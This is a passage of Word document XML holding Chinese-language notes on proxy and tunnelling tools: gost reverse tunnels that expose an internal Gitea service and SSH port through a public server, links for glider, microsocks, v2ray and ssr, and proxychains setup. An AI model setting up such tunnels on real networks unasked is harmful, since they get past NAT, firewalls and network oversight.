        <w:t>意思是，将机器</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>192.168.217.128</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定到机器</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.80.5.244</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rtcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无所谓，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的都行</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA3ABF" w14:textId="77777777" w:rsidR="00374104" w:rsidRDefault="00374104" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CBF9A7" w14:textId="231FEFE9" w:rsidR="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EA1D58" w14:textId="4210CFF0" w:rsidR="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r>
        <w:t>:8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就可以访问到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">B:5000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D8C29" w14:textId="77777777" w:rsidR="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606A27B1" w14:textId="77777777" w:rsidR="00FC5AD2" w:rsidRDefault="00FC5AD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6318FB9D" w14:textId="77777777" w:rsidR="00272051" w:rsidRDefault="00272051" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CA256B" w14:textId="31D7FB3A" w:rsidR="00272051" w:rsidRDefault="00272051" w:rsidP="00272051">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例：将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitea</w:t>
      </w:r>
      <w:r w:rsidR="00FF5076">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内网穿透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC2AA6" w14:textId="70391D2C" w:rsidR="00272051" w:rsidRDefault="00272051" w:rsidP="00272051">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端（</w:t>
      </w:r>
      <w:r w:rsidRPr="00272051">
        <w:t>192.227.167.113</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C7807A" w14:textId="3AE55072" w:rsidR="00272051" w:rsidRDefault="00272051" w:rsidP="00272051">
      <w:r w:rsidRPr="00272051">
        <w:t>./gost -L socks5://:38441</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44423D57" w14:textId="06CA9D70" w:rsidR="00272051" w:rsidRPr="00272051" w:rsidRDefault="00272051" w:rsidP="00272051">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被穿透机器：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05725D9F" w14:textId="1C1EFF95" w:rsidR="00AA03B9" w:rsidRDefault="00272051" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00272051">
        <w:t>gost -L rtcp://:3001/:3000 -F socks5://192.227.167.113:38441</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6632ECE2" w14:textId="1CD3CD38" w:rsidR="00821A28" w:rsidRDefault="00821A28" w:rsidP="00821A28">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00272051">
        <w:t>gost -L rtcp://:</w:t>
      </w:r>
      <w:r w:rsidR="00710505">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6000</w:t>
      </w:r>
      <w:r w:rsidRPr="00272051">
        <w:t>/:</w:t>
      </w:r>
      <w:r w:rsidR="00710505">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00272051">
        <w:t xml:space="preserve"> -F socks5://192.227.167.113:38441</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77006BC2" w14:textId="77777777" w:rsidR="00821A28" w:rsidRPr="00821A28" w:rsidRDefault="00821A28" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F5C501" w14:textId="1FA926FA" w:rsidR="00272051" w:rsidRDefault="00272051" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052DF000" w14:textId="46EAD83A" w:rsidR="00272051" w:rsidRDefault="0040094A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="002A3D5F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://192.227.167.113:3001/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41984782" w14:textId="77777777" w:rsidR="0040094A" w:rsidRDefault="0040094A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDBFC01" w14:textId="77777777" w:rsidR="0040094A" w:rsidRDefault="0040094A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DAE893A" w14:textId="77777777" w:rsidR="0040094A" w:rsidRDefault="0040094A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7691C4C0" w14:textId="7C688C38" w:rsidR="003F464D" w:rsidRDefault="003F464D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc159779616"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>glider</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w14:paraId="7E961229" w14:textId="776983F7" w:rsidR="003F464D" w:rsidRDefault="006F383F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006F383F">
        <w:t>https://github.com/nadoo/glider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ADADF6" w14:textId="2687D2B7" w:rsidR="006F383F" w:rsidRDefault="006F383F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43AB7532" w14:textId="77777777" w:rsidR="00312600" w:rsidRDefault="00312600" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765F39BE" w14:textId="58541833" w:rsidR="00246D0E" w:rsidRDefault="00246D0E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_Toc159779617"/>
      <w:r w:rsidRPr="00246D0E">
        <w:t>microsocks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w14:paraId="66FDACEB" w14:textId="4B7F7874" w:rsidR="00246D0E" w:rsidRDefault="002629E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002629E8">
        <w:t>https://github.com/rofl0r/microsocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F93A9" w14:textId="23BBDA47" w:rsidR="003F464D" w:rsidRDefault="003F464D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B1AAD5" w14:textId="77777777" w:rsidR="00312600" w:rsidRDefault="00312600" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BDB885" w14:textId="5C8571A9" w:rsidR="00E3694F" w:rsidRDefault="00E3694F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc159779618"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssr</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w14:paraId="110620E4" w14:textId="77777777" w:rsidR="00E3694F" w:rsidRDefault="00E3694F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F87943" w14:textId="6D0E3B19" w:rsidR="006D39E8" w:rsidRDefault="00824E99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没法儿本地开</w:t>
      </w:r>
      <w:r w:rsidR="006D39E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="006D39E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006D39E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidR="006D39E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议的转发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1266DDE2" w14:textId="77777777" w:rsidR="00824E99" w:rsidRDefault="00824E99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A833CD2" w14:textId="77777777" w:rsidR="00824E99" w:rsidRDefault="00824E99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B922665" w14:textId="77777777" w:rsidR="007E33D4" w:rsidRDefault="007E33D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9DE8E0" w14:textId="40CCE842" w:rsidR="004C452C" w:rsidRDefault="00E3694F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc159779619"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>2ray</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="0FF6F004" w14:textId="2961E6B6" w:rsidR="00E3694F" w:rsidRDefault="00C31C7F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C31C7F">
        <w:t>https://v2rayng.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A0E0B8" w14:textId="46D9D380" w:rsidR="001B0F04" w:rsidRDefault="001B0F04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D93BB7B" w14:textId="5017CF46" w:rsidR="001B0F04" w:rsidRDefault="001B0F04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>2ray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> core</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B47578" w14:textId="6E276B6E" w:rsidR="001B0F04" w:rsidRDefault="001B0F04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001B0F04">
        <w:t>https://github.com/v2fly/v2ray-core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79515072" w14:textId="77777777" w:rsidR="00870B23" w:rsidRPr="009F383C" w:rsidRDefault="00870B23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34133C9C" w14:textId="245B761E" w:rsidR="00A9479C" w:rsidRDefault="00A9479C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行自动订阅：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF80CCA" w14:textId="0811D563" w:rsidR="00E3694F" w:rsidRDefault="00E3694F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E3694F">
        <w:t>https://github.com/arkrz/v2sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2254F3" w14:textId="4D5192D3" w:rsidR="00E3694F" w:rsidRDefault="001554B1" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2336"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AAFCB6" w14:textId="7BC47D28" w:rsidR="00E3694F" w:rsidRDefault="00AB1062" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>2ray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的图形化：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B1C4E" w14:textId="47F14974" w:rsidR="00AB1062" w:rsidRDefault="00AB1062" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB1062">
        <w:t>https://github.com/2dust/v2rayN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6DD65E" w14:textId="70127B07" w:rsidR="00AB1062" w:rsidRDefault="00AB1062" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1006BB86" w14:textId="448E43F8" w:rsidR="009B2DAD" w:rsidRDefault="00C31C7F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安卓端去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2dust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>releases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下下载，安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>2rayNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E710EF0" w14:textId="77777777" w:rsidR="00C62F03" w:rsidRDefault="00C62F03" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E4C2FF" w14:textId="0D4F8369" w:rsidR="00C62F03" w:rsidRDefault="00C62F03" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安卓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> closed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错参考帖子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5ADE0E" w14:textId="5296FD58" w:rsidR="00C31C7F" w:rsidRDefault="00C62F03" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C62F03">
        <w:t>https://github.com/2dust/v2rayNG/issues/268</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ABCF10" w14:textId="77777777" w:rsidR="00C31C7F" w:rsidRDefault="00C31C7F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6767BB2A" w14:textId="02DD8CC1" w:rsidR="009B2DAD" w:rsidRDefault="009B2DAD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc159779620"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>prox</w:t>
      </w:r>
      <w:r>
        <w:t>ychains</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w14:paraId="020570BD" w14:textId="37626A74" w:rsidR="008C1678" w:rsidRDefault="00AF418D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r w:rsidR="008C1678">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E0A845" w14:textId="2EBF7558" w:rsidR="009B2DAD" w:rsidRDefault="00AF418D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF418D">
        <w:t>https://blog.popkx.com/Ubuntu-install-proxychains-let-terminal-using-socks5-proxy-speed-up-downloading/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089BEDD8" w14:textId="57C3A936" w:rsidR="009B2DAD" w:rsidRDefault="009B2DAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="083F5A35" w14:textId="5521D5EE" w:rsidR="00975284" w:rsidRDefault="00134927" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00134927">
        <w:t>sudo apt install proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666F7E45" w14:textId="6E7CF86C" w:rsidR="00975284" w:rsidRDefault="0001080A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0001080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要需要配置</w:t>
      </w:r>
      <w:r w:rsidRPr="0001080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/proxychains.conf </w:t>
      </w:r>
      <w:r w:rsidRPr="0001080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，打开之，在</w:t>
      </w:r>
      <w:r w:rsidRPr="0001080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[ProxyList]</w:t>
      </w:r>
      <w:r w:rsidRPr="0001080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项添加</w:t>
      </w:r>
      <w:r w:rsidRPr="0001080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> socks5 </w:t>
      </w:r>
      <w:r w:rsidRPr="0001080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的</w:t>
      </w:r>
      <w:r w:rsidRPr="0001080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ip:port</w:t>
      </w:r>
      <w:r w:rsidRPr="0001080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245D1322" w14:textId="5623760C" w:rsidR="00975284" w:rsidRDefault="0001080A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29748D6B" wp14:editId="7761FA4A">
            <wp:extent cx="2828925" cy="116205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8925" cy="1162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D5AAB" w14:textId="37A39179" w:rsidR="00975284" w:rsidRDefault="00975284" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2F2999" w14:textId="77777777" w:rsidR="00A52A23" w:rsidRDefault="00A52A23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过上面的配置和修改，终于可以正常使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxychains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的终端命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> socks5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理了，方法很简单，只需要在命令前加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxychains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B9738" w14:textId="77777777" w:rsidR="00A52A23" w:rsidRDefault="00A52A23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C50181" w14:textId="77777777" w:rsidR="00A52A23" w:rsidRDefault="00A52A23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ proxychains curl baidu.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD79A9C" w14:textId="77777777" w:rsidR="00A52A23" w:rsidRDefault="00A52A23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ sudo proxychains pip install numpy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910A08F" w14:textId="49535054" w:rsidR="0001080A" w:rsidRDefault="00A52A23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ sudo proxychains apt install gcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A3112" w14:textId="1CB97148" w:rsidR="0001080A" w:rsidRDefault="0001080A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113BA6A9" w14:textId="38754A28" w:rsidR="0001080A" w:rsidRDefault="0001080A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AAB32E" w14:textId="27DD70B0" w:rsidR="0001080A" w:rsidRDefault="00FB1DB5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc159779621"/>
      <w:r>
        <w:t>frp</w:t>
      </w:r>
